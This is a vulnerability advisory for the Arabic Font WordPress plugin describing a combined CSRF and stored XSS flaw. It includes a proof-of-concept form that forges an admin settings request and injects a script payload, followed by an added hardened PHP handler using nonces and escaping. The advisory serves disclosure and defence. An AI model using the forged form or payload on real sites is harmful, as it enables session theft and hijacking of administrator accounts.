Arabic Font - CSRF & Stored XSS
Description
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>
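As an added illustration that is not part of this advisory or of the plugin's own code, the following hardened save handler and panel renderer show the two controls the description says are missing: a nonce check on the save request (which the cross-site form above cannot supply) and context-aware escaping of stored values on output. The option key, nonce action name, function names and the admin_init hook are assumptions; the field names are taken from the proof of concept.

```php
<?php
// Added example (not the plugin's code): the two controls the advisory says are missing.
// Assumptions: settings live in one option 'af_settings' and are rendered by af_render_panel().

const AF_OPTION = 'af_settings';      // assumed option key
const AF_ACTION = 'af_save_settings'; // assumed nonce action name

// Save handler: reject requests that lack a valid nonce tied to the logged-in user.
// The CSRF form in the PoC has no way to obtain this value, so it is refused before anything is stored.
function af_handle_save() {
    if ( ! isset( $_POST['action'] ) || $_POST['action'] !== 'save' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( AF_ACTION, '_af_nonce' ); // dies on a missing or invalid nonce

    // Sanitise on input; the stored value is still treated as untrusted when rendered.
    $settings = array(
        'fontfamily'      => sanitize_text_field( wp_unslash( $_POST['AF_fontfamily'] ?? '' ) ),
        'fontsize'        => absint( $_POST['AF_fontsize'] ?? 0 ),
        'lineheight'      => absint( $_POST['AF_lineheight'] ?? 0 ),
        'textalign'       => sanitize_text_field( wp_unslash( $_POST['AF_textalign'] ?? '' ) ),
        'defaultcssclass' => sanitize_text_field( wp_unslash( $_POST['AF_defaultcssclass'] ?? '' ) ),
        'customcss'       => wp_strip_all_tags( wp_unslash( $_POST['AF_customcss'] ?? '' ) ),
    );
    update_option( AF_OPTION, $settings );
}
add_action( 'admin_init', 'af_handle_save' );

// Panel renderer: every stored value is escaped for the context it is echoed into, so a value
// such as .arab"><script>... ends up as inert text inside the attribute rather than new markup.
function af_render_panel() {
    $s = wp_parse_args( get_option( AF_OPTION, array() ), array( 'defaultcssclass' => '', 'customcss' => '' ) );
    ?>
    <form method="post">
        <?php wp_nonce_field( AF_ACTION, '_af_nonce' ); ?>
        <input type="text" name="AF_defaultcssclass" value="<?php echo esc_attr( $s['defaultcssclass'] ); ?>">
        <textarea name="AF_customcss"><?php echo esc_textarea( $s['customcss'] ); ?></textarea>
        <input type="hidden" name="action" value="save">
        <?php submit_button( 'Save changes', 'primary', 'save1' ); ?>
    </form>
    <?php
}
```

With the nonce in place, the forged request from the proof of concept is rejected before the payload is stored, and esc_attr() ensures that an already stored value cannot break out of the attribute when the panel is rendered.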

Affects Plugin

References

URL https://rastating.github.io/arabic-font-1-2-csrf-stored-xss

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter rastating
Submitter Website https://www.rastating.com/
Submitter Twitter @iamrastating
Verified No
WPVDB ID 8868

Timeline

Publicly Published 2017-07-20
Added 2017-07-21
Last Updated 2019-02-18
